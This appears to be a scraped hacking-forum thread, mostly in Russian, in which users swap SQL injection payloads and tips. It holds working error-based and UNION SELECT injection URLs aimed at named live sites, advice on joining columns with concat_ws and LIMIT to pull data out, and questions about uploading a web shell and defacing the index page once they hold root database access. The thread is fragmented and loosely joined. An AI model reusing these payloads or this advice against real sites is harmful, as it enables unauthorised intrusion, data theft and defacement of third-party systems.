SELECT * FROM menu_items WHERE link = '1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and''. Duplicate column name '5.5.8'
вопрос таков: если я имею рутовский доступ к БД, что я теоретически смогу сделать? Вплане заливки шелла, правки индекса... Например, через тулзу MySQL query browser
А как вывести только одну колонку ? Пытаюсь вот таким запросом http://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(information_schema.tables))and' Но в ответ пишет:
полный доступ к базе MySQL, создание/уничтожение и читать/писать файлы (если есть достаточно прав у пользователя MySQL в системе)
если разрешён коннект с удалённых ip для пользователя, то ты сможешь с неё подконнектится, иначе нет Подзапрос может возвращать только одно значение, тобишь нельзя использовать *, там же написано. Если надо вернуть несколько колонок сразу, то надо сначала их объединить оператором типа concat_ws(0x3a,column_1,column_2,...,column_n), где 0x3a = : в hex формате. А ещё предвижу ошибку subquery returned more than one row(ну или как-то так), это потому что надо использовать лимит в подзапросе.
Melfis ессесно я к ней и подключаюсь и все что хочешь могу делать. перефразирую: какие мне команды отправлять БД чтобы загрузить файл и вообще возможно ли это?
why i can not see vul columns no?? Code: http://www.myhomestory.com/interior-doors-gallery.php?id=-1%20UnioN%20selEct%20all%200,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
becouse id=1+and+1=0 http://www.myhomestory.com/interior-doors-gallery.php?id=1+and+1=0%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1-- this is forum Russian,translate write... уже наконец то
чего нашел?, просто создал не верную логику или же так http://www.myhomestory.com/interior-doors-gallery.php?id=111111111111111111111%20UnioN%20selEct%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7,8,9,0,1--